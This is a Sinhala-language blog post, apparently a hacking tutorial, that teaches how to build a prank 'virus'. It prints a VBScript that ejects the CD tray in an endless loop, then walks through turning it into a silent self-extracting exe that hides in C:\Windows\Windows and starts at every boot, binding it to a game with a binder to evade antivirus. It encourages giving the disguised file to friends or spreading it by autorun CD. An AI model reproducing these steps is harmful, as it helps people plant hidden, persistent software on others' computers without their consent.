මුලින්ම කිව්වොත් මේ virus එකෙන් වෙන්නේ CD tray එක නොනවත්වාම එලියට එනවා...ඇතුලට යනවා.. එලියට එනවා...ඇතුලට යනවා.. එලියට එනවා...ඇතුලට යනවා.. එලියට එනවා...ඇතුලට යනවා..
හරි දැන් මුලින්ම කිව්වොත් මේ script code එක මම ගත්තෙත් internet එකෙන්ම තමයි...ඒ උනත් මෙහෙමයි...ඒ මම ගත්ත code එකෙන් වෙන්නේ cd tray එක නොනවත්වාම එලියට එනවා...ඇතුලට යනවා විතරයි...ඒත් මම ඒක මගේ දැනුම භාවිතා කරලා දියුනු කරා...
හරි දැන් ඔයාල බලනවා ඇති මොනවද මම මගේ දැනුම භාවිතා කරලා දාපු වැඩ කෑලි කියලා....
මම ඒ script එක .exe file එකක් බවට හරවලා තියනවා...මේ exe file එකේ තියනවා අර කිව්ව script එකේ නැති වාසි ගොඩක්...
1)binder එකක් මගින් bind කරලා තියන නිසා anti virus protection වලින් ගැලවෙන්න පුලුවන්...ඒ කිව්වේ ගොඩක් anti virus software වලට මේක අල්ලගන්න බෑ....(binder එකක් කියන්නේ අපි හැක් කරන්න භාවිතා කරන keyloggers,rats ආදිය හන්ගන්ඩ වගේම virus හන්ගන්ඩත් භාවිතා කරනවා...මේවගෙන් bind කරපුවම ආයේ virus guard වලට අහු වෙන්නේ නෑ...binder ගැන සම්පූර්න ලිපි පෙලක් මම keyloggers යටතේ පල කරන්නම්...)
2)මේක නිකන්ම ක්‍රියාත්මක වෙනවා...කවුරුහරි ක්ලික් කරපු ගමන්ම වැඩ කරන්න පටන් ගන්නවා...ඒ කිව්වේ මොකුත්ම dialog box එන්නේ එහෙම නෑ...
3)task bar එකෙන් hide කරලා තියන නිසා හොයාගන්ඩ අමාරුයි...
4)පරිගනකය power on කරන හැම වෙලාවකම නිකන්ම ක්‍රියාත්මක වෙන්ඩ පටන් ගන්නවා...
5)script එක install වෙන්නේ C:\Windows\Windows වලට..ඒ නිසා හොයාගන්ඩ බෑ...
හරි මම ඔය කිව්ව වාසි ගොඩක් ඔය script එක දියුනු කරා...
දැන් ඉතින් කරන්න තියෙන්නේ මෙන්න මෙතනින් ගිහින් ඒක බා ගන්න...
ඊට පස්සේ ඒකට ලස්සන නමක් එහෙම දීලා යාලුවෙකුට දෙන්න තමා තියෙන්නේ...එක පාරක් ක්ලික් කරොත් ඔන්න එයාට වැඩේ හරි...
තව දෙයක්...ඔයාට පුලුවන් autorun වෙන්ඩ හදලා ඕක cd එකකට write කරන්න...ඊට පස්සේ ඉතින් බොහොම ලේසියෙන්ම මේ virus එක දෙන්න පුලුවන්....
හරි දැන් බලමු ඔය කිව්ව virus එක හදාගන්නේ කොහොමද කියලා...
මුලින්ම මේ code එක notepad එකකට කොපි කරලා script.vbs වගේ නමක් දීලා save කරගන්න...මොන නම දුන්නත් කමක් නෑ...නමේ අගට .vbs කියලා දාලා save කරන්න...
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
හරි දැන් ඒක win rar archive එකකට add කරගන්න...
දැන් SFX කියන option එක තෝරන්න...
එකේ advanced sfx options කියන එක තෝරන්න...එතකොට popup window එකක් open වෙයි...
එකේ path to extract කියන තැනට ඔයාට මේක install වෙන්න ඕන තැන දෙන්න..

shortcuts වලට startup වලට shortcut එකක් දෙන්න..
silent mode කියන එකේ hide all සහ overwrite mode කියන එකේ overwrite all files තෝරන්න...
දැන් ඔයාට කැමති icon එකක් එහෙම දෙන්න පුලුවන්...
හරි ඊට පස්සේ OK කරන්න...
හරි දැන් ඔයාගේ virus එකේ වැඩේ 75% ඉවරයි...
දැන් මේක virus guard වල අහු වෙනවා..මේක නැති කරන්නේ කොහොමද?????????????
මුලින්ම මෙතනින් ගිහින් binder එක download කරගන්න...
හරි දැන් ඔයා අර හදාගත්ත .exe file එක add කරගන්න...දැන් ඔයා කැමති මොකක් හරි පොඩි game එකක් හරි software එකක් හරි add කරගන්න...
ඊට පස්සේ output file එකට අර game එකේ හරි software එකේ හරි නම දෙන්න..icon එකට අර game එකේ හරි software එකේ හරි icon එක දෙන්න එහෙම දීලා Bind Files දෙන්න...දැන් හැදුන file එක අර game එක වගේමයි...ඒක run කලත් run වෙන්නේ game එක...ඒත් ඒ එක්කම අපේ virus එකත් කිසිම සද්දයක් නැතුව වැඩ කරන්න පටන් ගන්නවා...
ඔන්න දැන් වැඩේ හරි........ඔන්න තියනවා ඔයාගේ virus එක...
පොඩ්ඩක් ක්ලික් කරලා බලන්නකො වැඩ කරන ලස්සන...
දැන් ඔයාල බලනවා ඇති මේකා virus එකක් දීලා අපිට කෙලවන්ඩද යන්නේ කියලා....
නෑ නෑ....මම කියලා දෙන්නම් මේකෙන් ගැලවෙන විදිහ...
taskbar එකේ right click කරලා task manager යන්න..ඒකේ processes යටතේ ඇති wscript කියලා process එකක්..ඒක end කරන්න...ඔන්න වැඩේ ඉවරයි.....

ඔයාලට සමහර විට මේක හදා ගන්ඩ අමාරු වෙන්ඩ පුලුවන්...මෙන්න මෙතනින් ගිහින් මම සම්පූර්නයෙනම හදලා ඉවර කරපු virus එක download කරගනක්න පුලුවන්...
DNS Changer virus එකත් හදන විදිහ ලගදිම කියලා දීලා phishing ගැන ලියලා ඉවර කරනවා...ඒත් වෙලාව තමා නැත්තේ....ඒත් ඉක්මනටම දාන්නම්....
එහෙනම් එතකන්
KEEP IN TOUCH WITH ME
No comments:
Post a Comment